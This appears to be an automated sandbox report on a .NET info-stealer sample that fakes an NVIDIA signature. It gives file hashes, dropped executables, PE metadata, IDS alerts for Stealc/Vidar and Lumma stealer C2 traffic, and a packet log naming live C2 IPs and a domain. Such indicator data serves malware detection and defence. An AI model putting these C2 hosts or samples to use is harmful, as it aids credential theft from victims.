SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66f75fd9dc673_vasd[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5661736
Entropy (8bit):	7.999897874450605
Encrypted:	true
SSDEEP:	98304:Eg2nmyTusqokbqW3alL1eMT8dq+5L34fs6DvS/GhE5ZyxDmwXQsZRqKoGgLNxeId:bryTusqok2kgeMIY+5L34f2MCkmwXdRk
MD5:	8D556F35D2768D27B334D0E76D4D3295
SHA1:	33F2FBFE5C2B3D3D470BBF28C20E15283E20717C
SHA-256:	2BDAB82A67299FF24CCA7E0884C17FAB80F45B364BA718142C80BDFBD573B581
SHA-512:	EADEC8014BC15D1F72C44E5A45A2546A450D3C529AECC21D850EA50EBDA1B5D47D569B4C6AEF4215C402DB87EFBAC7550736D28BC101D920F900EA80F83BC4EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a].f.................4V.........~RV.. ...`V...@.. ........................V...........`.................................0RV.K....`V..............>V.(&....V......PV.............................................. ............... ..H............text....2V.. ...4V................. ..`.rsrc........`V......6V.............@..@.reloc........V......<V.............@..B................`RV.....H........@V.@.................................................................\..{...>..r.'...t.....U..I.s.d.L...P...,...j...\%.S......".i..B..q.p.ZIZ.$.A.]..m...r...o$......QI.;O.+3@6FN.W..g>.P.e.}........X....v-+.Y.\.z./a.6~.r.....u.+.)..I...7......DW...$;..Ex....s71&.!......t_..\.9....h..J0Oa/.l.t.Z[..z..Q.f..M...Z..J%..(.r%&.5..Qw.k..X.E.....k+!...k]y..&..u..p<o.!"T1..?...c.q..:3.N.sI.-$v..l..Y...z...V.!d.?(S.h..>.j...gA.p..=$..U..."45p.p..T..7..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66f75feece638_ldmg[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	380456
Entropy (8bit):	7.98798922649988
Encrypted:	false
SSDEEP:	6144:zkNlqnxjFg6Bn/Q+Ge966uvZ3ImhmjPFYoyPcYdhXBawaHO3EO:zGexjXB7G73x3hgPiBPcYdjKHO3EO
MD5:	687846A623C1FE1DA95F0FA2FE4479DF
SHA1:	6609D10980800B669E723D4C660C421E27695A29
SHA-256:	BFC7B367D52504B184D127E385219006C1EFC7E985D608C000E5EB3A204FC779
SHA-512:	FE150D4F02532CA3D5AA37C6D14741A0A9C0290854AC6924DA282AD6585B47BF98E8443AA4281EA89788B8E906F8D11D49B3E88A11E10D4D67B6E2605004A9C3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^.f............................~.... ........@.. ....................................`.................................0...K.......................(&........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H...........@..............................................................!^. .4..........nJ..../B..A.D.R...W........~.\..i........?.O9...dl..............h..h.`.P.w.s..=.J].}9.............k'E.V ....k..3..k{.f+..?..P.:..d.X..C;7\|..h/p.&.k.<.-G...w.:N...1U.6S...6.y...`m..o..+.....Z...Q.....J{.W .D)....tqb...z.x....#..x../v..y.......;.+..D?...w.Tq..N-.AM.@..~HI=e5..9F...k...{_......i[...R5.........}..m..c...L.S..G../V..:55T....E.}....I.....J......p..:..ze#o.

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:4uu5:ju5
MD5:	F12FCF99D49F56E66D752B3BEC60EB5D
SHA1:	6523F154A1FCC3E09F5DB8F3D0536750BAF37BDB
SHA-256:	F198E314DDF4320E1577A5E3490422B1CB15A543700A883554E3B990B4109C71
SHA-512:	9A037DA31E3EAB7930F28C384FA83A8E4AEE8DC46ACE3EA35AADF40A15A71F9C3838F92D459923EC4A311EC270F749AAD4EB9AC7D858E9D4BF1F10D6A5D8B1F6
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469488185311377
Encrypted:	false
SSDEEP:	6144:wzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNqjDH5S:mZHtYZWOKnMM6bFpQj4
MD5:	C6CBC68BDDA5E74AC76D2B8C5F4A00F7
SHA1:	21ECF1C303CEA991222DAD82E74FBF5E9C1C8419
SHA-256:	9029BDE53B2C3DF082928EDEE5C384D331CAA65143E1FC586D92BEAE88D4A930
SHA-512:	6F7A2417E84F12BE9063A8A2947BEC5CD0D278DF27FBBC742AD441109166B7F03ABBA0C8166FA72B6C532F1279DD7CF0E58614F92484759C0411C513C737EA5A
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ...U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.999889195768626
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	5'661'736 bytes
MD5:	021d0c04cb4de2638dbd89de7625f9b7
SHA1:	054945dca5b06ea8cdb7f00571084d406a3ff95c
SHA256:	ed59e78a2d10d6efec14c037d13d029d43a38f5a0ec1d441b3490e105a620913
SHA512:	d20da669fc476ff5ba15fcb4e57d620b2b1769406c653abd647eeb67cf77d3dce087c97789a175de47dd15bdce72c5ea8d1e0df58939854c1b21ff5ad66a4357
SSDEEP:	98304:igaE6aTO7kajvPkgKBS58lw6CN5HY0qxG1drEqNXn6NyjeftKFPksryk:i0XTPK5B+cN1Y0qxMdRNXnXCtK7ek
TLSH:	B44633DDA5232162CE74DD38BFB2490629A974F592E1C98893186B0B54B4B793C7F3F0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].f.................4V.........~RV.. ...`V...@.. ........................V...........`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x96527e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F75DD9 [Sat Sep 28 01:37:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x565230	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x566000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x563e00	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x568000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5650f8	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x563284	0x563400	443803a6c87ef47610494ca7af9ab1ca	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x566000	0x5c8	0x600	543b72590527283ca15b34b65f1efc1f	False	0.435546875	data	4.111123421870647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x568000	0xc	0x200	5232d7778f1aeeb8ebe6a4d11a044697	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5660a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x5663d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-28T05:23:28.147378+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.6	49722	172.67.167.90	443	TCP
2024-09-28T05:23:29.391839+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	172.67.167.90	443	192.168.2.6	49723	TCP
2024-09-28T05:23:30.590913+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	172.67.167.90	443	192.168.2.6	49724	TCP
2024-09-28T05:23:43.885838+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49735	172.67.167.90	443	TCP
2024-09-28T05:23:45.076275+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.6	58005	1.1.1.1	53	UDP
2024-09-28T05:23:45.558697+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.6	49737	188.114.97.3	443	TCP
2024-09-28T05:23:45.707900+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49737	188.114.97.3	443	TCP
2024-09-28T05:23:45.707900+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49737	188.114.97.3	443	TCP
2024-09-28T05:23:46.233021+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.6	49738	188.114.97.3	443	TCP
2024-09-28T05:23:46.534105+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49739	172.67.167.90	443	TCP
2024-09-28T05:23:46.702174+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49738	188.114.97.3	443	TCP
2024-09-28T05:23:46.702174+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49738	188.114.97.3	443	TCP
2024-09-28T05:23:55.448976+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.6	49745	45.132.206.251	80	TCP
2024-09-28T05:24:18.225609+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	172.67.167.90	443	192.168.2.6	49751	TCP
2024-09-28T05:24:19.417032+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	172.67.167.90	443	192.168.2.6	49752	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 05:23:23.744158983 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:23.744201899 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:23.744498968 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:23.750797987 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:23.750812054 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.357608080 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.357816935 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.411616087 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.411643028 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.411988020 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.412059069 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.415838003 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.459399939 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.610929012 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.610997915 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.610996962 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.611027956 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.611063004 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.611068010 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.611093044 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.611104965 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.611118078 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.611141920 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.611145973 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.611193895 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.611242056 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.611283064 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.616036892 CEST	49719	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:23:24.616050959 CEST	443	49719	149.154.167.99	192.168.2.6
Sep 28, 2024 05:23:24.633799076 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:24.633836985 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:24.633974075 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:24.634490967 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:24.634504080 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.105153084 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.105293989 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.130775928 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.130801916 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.131175995 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.131227016 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.131730080 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.179419994 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.764764071 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.764837980 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.764872074 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.764900923 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.767637014 CEST	49720	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.767646074 CEST	443	49720	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.769989014 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.770039082 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:25.770116091 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.770327091 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:25.770340919 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.260454893 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.260600090 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.261142969 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.261152983 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.263935089 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.263942957 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.968230009 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.968471050 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.968514919 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.968595028 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.968732119 CEST	49721	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.968770981 CEST	443	49721	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.970698118 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.970746994 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:26.970834017 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.971106052 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:26.971136093 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:27.451673031 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:27.451818943 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:27.452408075 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:27.452426910 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:27.454703093 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:27.454742908 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.147402048 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.147440910 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.147480011 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.147541046 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.147582054 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.147594929 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.147624969 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.147646904 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.149116993 CEST	49722	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.149144888 CEST	443	49722	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.159445047 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.159488916 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.159560919 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.160043001 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.160056114 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.618721008 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.618799925 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.619503021 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.619513988 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:28.621803999 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:28.621809006 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391009092 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391043901 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391072989 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391091108 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391124964 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391129971 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391166925 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391184092 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391184092 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391215086 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391664028 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391707897 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391710997 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391752005 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391783953 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391797066 CEST	443	49723	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.391805887 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.391839981 CEST	49723	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.393518925 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.393548965 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.393635988 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.393867016 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.393882036 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.875076056 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.875165939 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.875663042 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.875679016 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:29.877592087 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:29.877598047 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:30.590327024 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:30.590436935 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.590449095 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:30.590544939 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.590550900 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:30.590593100 CEST	443	49724	172.67.167.90	192.168.2.6
